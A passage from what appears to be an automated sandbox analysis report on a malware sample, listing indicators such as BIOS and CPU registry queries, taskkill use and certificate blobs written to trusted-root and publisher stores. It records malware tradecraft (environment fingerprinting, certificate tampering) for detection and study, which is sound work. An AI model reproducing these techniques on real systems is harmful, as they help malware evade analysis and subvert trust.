\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 57 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS VPN.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 72DD.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 72DD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU VPN.tmp Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Cleaner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 2 IoCs
pid Process 4120 taskkill.exe 7164 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates mask_svc.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} Setup.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" Setup.tmp -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Setup.exe Set value (data) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Set value (data) 